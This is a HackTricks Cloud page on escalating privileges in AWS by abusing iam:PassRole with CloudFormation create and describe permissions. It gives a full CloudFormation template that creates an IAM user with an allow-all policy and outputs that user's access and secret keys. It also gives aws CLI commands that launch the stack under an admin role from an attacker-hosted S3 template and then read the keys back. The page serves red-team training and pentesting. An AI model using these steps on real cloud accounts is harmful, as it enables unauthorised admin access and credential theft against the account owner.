iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

An attacker could for example use a cloudformation template that generates keys for an admin user like:

{
     "Resources": {
         "AdminUser": {
             "Type": "AWS::IAM::User"
         },
         "AdminPolicy": {
             "Type": "AWS::IAM::ManagedPolicy",
                 "Properties": {
                 "Description" : "This policy allows all actions on all resources.",
                 "PolicyDocument": {
                     "Version": "2012-10-17",
                     "Statement": [
                     {
                         "Effect": "Allow",
                         "Action": [
                         "*"
                         ],
                         "Resource": "*"
                     }]
                 },
                 "Users": [{
                     "Ref": "AdminUser"
                 }]
             }
         },
         "MyUserKeys": {
             "Type": "AWS::IAM::AccessKey",
             "Properties": {
                 "UserName": {
                     "Ref": "AdminUser"
                 }
             }
         }
       },
     "Outputs": {
         "AccessKey": {
             "Value": {
                 "Ref": "MyUserKeys"
             },
             "Description": "Access Key ID of Admin User"
         },
         "SecretKey": {
             "Value": {
                 "Fn::GetAtt": [
                 "MyUserKeys",
                 "SecretAccessKey"
                 ]
             },
             "Description": "Secret Key of Admin User"
         }
     }
}

Then generate the cloudformation stack:

aws cloudformation create-stack --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::[REDACTED]:role/adminaccess \
    --capabilities CAPABILITY_IAM --region us-west-2

Wait for a couple of minutes for the stack to be generated and then get the output of the stack where the credentials are stored:

aws cloudformation describe-stacks \
    --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
    --region uswest-2

References

https://bishopfox.com/blog/privilege-escalation-in-aws

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Cloudformation Privesc NextAWS - Cognito Privesc

Last updated 3 months ago

{ "Resources": { "AdminUser": { "Type": "AWS::IAM::User" }, "AdminPolicy": { "Type": "AWS::IAM::ManagedPolicy", "Properties": { "Description" : "This policy allows all actions on all resources.", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "*" ], "Resource": "*" }] }, "Users": [{ "Ref": "AdminUser" }] } }, "MyUserKeys": { "Type": "AWS::IAM::AccessKey", "Properties": { "UserName": { "Ref": "AdminUser" } } } }, "Outputs": { "AccessKey": { "Value": { "Ref": "MyUserKeys" }, "Description": "Access Key ID of Admin User" }, "SecretKey": { "Value": { "Fn::GetAtt": [ "MyUserKeys", "SecretAccessKey" ] }, "Description": "Secret Key of Admin User" } } }

aws cloudformation create-stack --stack-name privesc \ --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ --role arn:aws:iam::[REDACTED]:role/adminaccess \ --capabilities CAPABILITY_IAM --region us-west-2